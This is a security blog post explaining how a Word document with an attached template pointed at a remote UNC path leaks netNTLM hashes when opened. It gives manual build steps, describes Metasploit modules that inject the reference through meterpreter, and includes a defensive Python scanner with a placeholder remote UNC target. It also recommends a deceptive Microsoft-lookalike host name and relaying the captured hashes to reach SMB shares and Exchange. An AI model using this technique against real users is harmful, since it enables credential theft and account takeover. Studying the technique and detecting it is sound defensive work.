Stealing netNTLM credentials by injecting UNC path into .docx
Confirmed vulnerable are:
• Microsoft Word 2003
• Microsoft Word 2007
• Microsoft Word 2010
Using the .doc, .xml and .docx formats.
When doesn’t it work?
• Preview document window in Outlook.
• Opening document in read-only mode (like when it’s downloaded from the internet).
What can it do?
By using this method it's possible to obtain netNTLM hashes from local and domain users by sending them a specially crafted MS Word document. Upon opening it, Word will try to connect to a server, thus supplying the netNTLM hashes and challenges to a remote destination of the attacker's choice.
Why does this work?
This is not a new issue; the functionality has been around at least since Microsoft Office 2003 (verified). The difference is that, as far as we know, this is a new vector for netNTLM-hash stealing itself. The main issue is that documents created in MS Word allow a UNC-path template location to be specified and saved into the document itself. Using this, a malicious person can create a document that points to his server and makes Word contact it when the document is opened. When converted to an XML document, the tag that causes the behavior that can be abused is this:
Any version of MS Word from 2003 onward will, upon opening the document, connect to the referenced site using the SMB protocol. HTTPS for WebDAV seems to be valid too, but does not result in the hashes being submitted.
Creating an evil reference manually
- Using Microsoft Office 2003, 2007 or 2010 (verified), create a dotx template file. Save this template file to a UNC location, which is either a valid IP or FQDN that can be reached over the internet.
- Create a new Word document based on the just-made dotx. Save this document as docx.
- Opening this document now will result in your netNTLM hashes being submitted to the referenced UNC location.
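As an added, defender-side example (not code from the original post or its Metasploit modules), this Python script checks a .docx for the attached-template relationship through which the UNC template location described above is saved into the document, and flags any that points at a remote host. It assumes the OOXML container, so it does not cover the binary .doc format, and the address in the constructed sample part is a placeholder.

```python
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Word stores the attached template as a relationship of this type, normally in
# word/_rels/settings.xml.rels, with TargetMode="External".
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument"
                     "/2006/relationships/attachedTemplate")
# Remote targets: a UNC path (\\host\share or //host/share, optionally as a file: URI)
# or an http(s) URL. A local drive path such as file:///C:\... is deliberately not matched.
REMOTE_TARGET = re.compile(r"^(?:(?:file:)?(?:\\\\|//)(?=[^\\/])|https?://)", re.IGNORECASE)


def scan_rels_part(part_name, xml_bytes):
    """Return [(part_name, target)] for each attachedTemplate rel pointing at a remote host."""
    hits = []
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return hits  # malformed part: nothing we can reason about here
    for rel in root.iter("{%s}Relationship" % REL_NS):
        target = rel.get("Target", "")
        if (rel.get("Type") == ATTACHED_TEMPLATE
                and rel.get("TargetMode") == "External"
                and REMOTE_TARGET.match(target)):
            hits.append((part_name, target))
    return hits


def find_remote_templates(docx_path):
    """Scan every .rels part inside an OOXML container (.docx/.dotx/.docm)."""
    hits = []
    with zipfile.ZipFile(docx_path) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                hits += scan_rels_part(name, z.read(name))
    return hits


# Constructed sample parts (placeholder TEST-NET address, not taken from a real document).
SUSPICIOUS_RELS = (b'<?xml version="1.0" encoding="UTF-8"?>'
                   b'<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                   b'Target="\\\\203.0.113.10\\share\\template.dotx" TargetMode="External"/>'
                   b'</Relationships>' % (REL_NS.encode(), ATTACHED_TEMPLATE.encode()))
BENIGN_RELS = SUSPICIOUS_RELS.replace(b"\\\\203.0.113.10\\share\\template.dotx",
                                      b"file:///C:\\Users\\alice\\Templates\\Normal.dotm")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, "->", find_remote_templates(path) or "no remote template reference")
```

Run it against a mail-gateway or file-share sample set to surface documents that would make Word reach out over SMB or WebDAV on open.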
I have created two modules for Metasploit to abuse this. First, an Auxiliary module that can both insert a reference into an existing file and create a new document. Secondly, I created a Post module that allows, in meterpreter shells, inserting the UNC reference into a file on the remote site. Currently this is done without preserving the file timestamp, but that's on the todo list. Because it's likely that you run into a Linux-type machine as a document filestore at some point, it's verified to work with Linux too. Note: these are my current dev paths to where I put the modules; that might change as I plan to submit them to the Metasploit framework.
The Post module in action:
Note that the default setting of the POST module keeps a copy locally of the modified file.
What happens when someone opens the document
Depending on the version of MS Word, this screen will be visible for quite a long time. It's not very hidden, as you can see, and that's why it's probably a good idea to use a dynamic host provider so you can point to something like updates.microsoft-office-server.dyndns.com or something less conspicuous.
How can you use this, other than the obvious password cracking?
Other than the obvious password cracking tools, there are much better ways to abuse the fact that you have these netNTLM hashes. Relay modules like Metasploit's smb_relay or ZackAttack could be used with this to get access to not just SMB shares, but also Exchange!
You should definitely read up on what ZackAttack can do to get the most out of these modules.
Where can you find the modules:
The modules can be found on my GitHub:
- lucidnight/smilingraccoon for helping me with Ruby and Metasploit.
- Audi-1 for the original document analysis that gave me the idea for the modules.